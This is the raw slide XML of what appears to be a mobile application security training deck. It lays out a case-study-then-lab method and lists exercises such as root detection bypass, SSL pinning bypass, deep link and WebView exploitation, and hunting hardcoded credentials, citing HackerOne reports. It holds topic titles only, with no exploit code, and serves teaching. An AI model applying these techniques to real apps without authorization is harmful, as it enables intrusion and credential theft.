            <a:off x="4716729" y="3151495"/>
            <a:ext cx="4578350" cy="871970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800"/>
              <a:t>Case-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1"/>
              <a:t>study</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800"/>
              <a:t> on a real-world </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF138B4-E088-49E9-9A8F-53656DC75912}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2004170" y="5176466"/>
            <a:ext cx="4578350" cy="456472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1"/>
              <a:t>Reproduce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1"/>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1"/>
              <a:t>lab</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D97464B6-E1BB-490B-B05A-725E2BFACC16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-285005" y="3151495"/>
            <a:ext cx="4578350" cy="456472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1"/>
              <a:t>Disscuss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800"/>
              <a:t> fix &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" err="1"/>
              <a:t>remediation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 2" descr="fleche bleue3 - Dolmen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61AE5775-26E5-4247-8491-C610DFAA3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813651">
            <a:off x="5426277" y="4245429"/>
            <a:ext cx="1335652"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leche bleue3 - Dolmen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C53DF68-8710-4D6E-885C-7C27C87E2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705868">
            <a:off x="1775205" y="4249295"/>
            <a:ext cx="1335652"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leche bleue3 - Dolmen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B6A1DB9-4421-460A-B4E3-F268FA726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618068">
            <a:off x="1601722" y="2339113"/>
            <a:ext cx="1335652" cy="720000"/>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87847AB-E670-4020-9C14-78A115C8C1B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3933345" y="1387835"/>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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C535661C-23AF-4DF5-BA3A-2FABBA2ECB65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6863641" y="4015547"/>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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Oval 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5CA7966-643C-4B1E-8506-A9B3790AF3EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4105995" y="5808383"/>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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Oval 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC2E5BB-93FE-4628-9138-7C5AABB2B433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1370578" y="3704105"/>
            <a:ext cx="360000" cy="360000"/>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rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="741358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1" y="1447801"/>
            <a:ext cx="4153269" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Exercice 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>logging</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Exercice 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Hardcoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Exercice 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: Root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Exercice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Exploiting Broadcast </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Reciever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Exercice 5 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>DeepLinks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Exercice 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>WebView</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Bonus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> : 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>crackme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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Liste of exercices/challenges</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC09174B-827F-4EBF-AD0B-8289A645B9AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4901831" y="1447801"/>
            <a:ext cx="4153269" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="285750" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="355600" indent="-177800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="541338" indent="-185738" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="719138" indent="-177800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="896938" indent="-177800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPct val="10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fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Exercice 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Weak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Exercice 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Local Storage </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Exercice 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: Reverse Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Exercice 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: Runtime Manipulation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Exercice 11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Bypass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85623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a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Recon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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3F38CBD-C120-407C-B259-F04042224A05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345278" y="1159669"/>
            <a:ext cx="6649960" cy="5102226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1306726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Mission Briefing : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>The application uses secret keys to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>authenticate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> services. Try to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> hacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>skills</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Ressources :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Zomato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Hardcoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://hackerone.com/reports/246995</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>8x8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Hardcoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://hackerone.com/reports/412772</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Reverb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Hardcoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> API Secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://hackerone.com/reports/351555</a:t>
